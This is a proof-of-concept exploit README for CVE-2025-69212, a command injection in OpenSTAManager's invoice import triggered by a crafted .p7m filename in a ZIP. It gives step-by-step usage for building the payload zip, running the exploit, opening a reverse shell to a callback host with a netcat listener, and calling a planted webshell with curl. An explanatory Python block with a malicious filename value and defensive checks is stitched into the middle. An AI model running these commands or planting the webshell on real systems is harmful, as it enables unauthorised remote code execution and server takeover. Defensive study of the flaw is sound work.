## https://sploitus.com/exploit?id=7A2BFD33-83FB-5B33-86D9-0CC82F7A488C
# CVE-2025-69212 PoC - OpenSTAManager P7M Command Injection RCE Exploit

Proof of Concept (PoC) exploit for **CVE-2025-69212**, an authenticated
**OS command injection** leading to **remote code execution (RCE)** in
**OpenSTAManager <= 2.9.8**.

An authenticated user with access to the electronic-invoice import can upload a
ZIP containing a `.p7m` file whose filename carries shell metacharacters. The
importer hands the extracted filename to an OS command without neutralising it
(sink: `src/Util/XML.php::decodeP7M`), so the command embedded in the name runs
on the server with the privileges of the PHP process.

**Requirements:** authenticated account with invoice-import access, and import
method set to `Automatico`.
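The bug class in miniature, as an added example that is not code from OpenSTAManager or from this PoC repository: a ZIP entry name is spliced into a command string, so a `;` in the name ends the intended command and starts another. The `openssl smime` invocation is an assumption standing in for whatever `decodeP7M` actually runs, and the entry names, the `/tmp/pwned` path and the validator regex are constructed for the illustration. The block builds such a ZIP in memory, shows what the shell would make of the unsafe string, and contrasts it with an argv-style invocation and an allow-list check on the entry name, which is the fix a maintainer would want.

```python
"""Filename-based OS command injection: unsafe pattern, safe pattern, guard.

Added example, not the project's or the exploit's own code. The openssl
command line is an assumption used only to illustrate the sink shape.
"""
import io
import re
import shlex
import zipfile

# Constructed entry names. The trailing "# " makes the shell ignore the rest
# of the original command line after the injected one.
SAFE_NAME = "IT01234567890_00001.xml.p7m"
EVIL_NAME = "IT01234567890_00001.xml.p7m; id > /tmp/pwned # "


def build_zip(entry_name: str, content: bytes = b"not a real PKCS#7 blob") -> bytes:
    """Build an in-memory ZIP with one .p7m entry; zipfile keeps the name verbatim."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, content)
    return buf.getvalue()


def list_entries(zip_bytes: bytes) -> list:
    """Entry names exactly as an importer would read them back."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def vulnerable_command(path: str) -> str:
    """The bug class: the attacker-controlled name is interpolated into a
    command string that is later given to a shell (assumed sink shape)."""
    return f"openssl smime -verify -noverify -inform DER -in {path} -out out.xml"


def safe_argv(path: str) -> list:
    """Argument vector for subprocess.run(..., shell=False): the name is one
    argv element and can never be parsed as a second command."""
    return ["openssl", "smime", "-verify", "-noverify", "-inform", "DER",
            "-in", path, "-out", "out.xml"]


def shell_splits_into_extra_command(cmd: str) -> bool:
    """True if a POSIX shell would tokenize cmd into more than one command.
    shlex with punctuation_chars emits ';', '&', '|' and friends as tokens."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return any(tok in (";", "&", "&&", "|", "||") for tok in lex)


# Allow-list for archive entry names: no spaces, no shell metacharacters,
# no path separators, and only the two extensions the importer expects.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9._-]+\.(?:xml|p7m)$", re.IGNORECASE)


def validate_entry_name(name: str) -> bool:
    """Reject the name before it reaches any shell or filesystem call."""
    return SAFE_NAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    for name in (SAFE_NAME, EVIL_NAME):
        entries = list_entries(build_zip(name))
        cmd = vulnerable_command(entries[0])
        print(f"{name!r}: splits={shell_splits_into_extra_command(cmd)} "
              f"allowed={validate_entry_name(name)}")
```

Note that the allow-list check belongs at the point where the archive is unpacked, not only in front of the shell call: an unchecked name is also a path-traversal vector when the extracted file is written to disk.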

## Usage

Build the payload zip:
```
python3 genzip.py -o exploit.zip
```

Run the exploit:
```
python3 exploit.py -t target.com -u user -p pass -z exploit.zip
```

Reverse shell (start a listener on the callback host first, e.g. `nc -lvnp 4444` on 10.0.0.5):
```
python3 exploit.py -t target.com -u user -p pass -z exploit.zip -l 10.0.0.5 -lp 4444
```

The webshell is written into the application's web-accessible `files/` directory and is reachable at `/files/SHELL.php` (remove it when testing is done):
```
curl "http://target.com/files/SHELL.php?c=id"
```

## References

- CVE-2025-69212: https://nvd.nist.gov/vuln/detail/CVE-2025-69212
- Advisory (GHSA-25fp-8w8p-mx36) — discovered by Łukasz Rybak

For authorized testing and educational use only.